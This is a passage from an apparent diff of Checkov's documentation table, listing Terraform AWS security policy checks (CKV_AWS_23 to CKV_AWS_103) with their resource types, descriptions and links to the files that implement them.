[SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 73 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 74 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | 
[SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 75 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 76 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 77 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 78 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 79 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 80 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 81 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no 
security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 82 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 83 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 84 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 85 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | +| 86 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | +| 87 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | +| 88 | CKV_AWS_29 | resource | 
aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | +| 89 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | +| 90 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | +| 91 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) | +| 92 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) | +| 93 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) | +| 94 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at 
rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) | +| 95 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) | +| 96 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) | +| 97 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) | +| 98 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) | +| 99 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 100 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) 
| Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 101 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 102 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) | +| 103 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) | +| 104 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) | +| 105 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | +| 106 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) | +| 107 | CKV_AWS_46 | resource | aws_instance | Ensure no 
hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 108 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 109 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 110 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) | +| 111 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) | +| 112 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) | +| 113 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) | +| 114 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) | +| 115 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | 
Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) | +| 116 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) | +| 117 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) | +| 118 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) | +| 119 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | +| 120 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. 
| Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | +| 121 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) | +| 122 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) | +| 123 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | +| 124 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | +| 125 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 126 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 127 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges 
are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 128 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 129 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 130 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 131 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 132 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 133 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 134 | CKV_AWS_63 | resource | 
aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | +| 135 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) | +| 136 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) | +| 137 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) | +| 138 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) | +| 139 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) | +| 140 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) | +| 141 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any 
Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | +| 142 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | +| 143 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) | +| 144 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) | +| 145 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) | +| 146 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) | +| 147 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) | +| 148 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | 
[APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | +| 149 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | +| 150 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) | +| 151 | CKV_AWS_78 | resource | aws_codebuild_project | Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | +| 152 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 153 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 154 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 155 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | +| 156 | 
CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | +| 157 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 158 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 159 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 160 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 161 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 162 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | +| 163 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront 
distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 164 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | +| 165 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 166 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 167 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 168 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | +| 169 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 170 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | 
[ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 171 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | +| 172 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 173 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 174 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 175 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | +| 176 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 177 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the 
Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | +| 178 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | +| 179 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 180 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | +| 181 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | +| 182 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 183 | CKV_AWS_103 | resource | aws_lb | 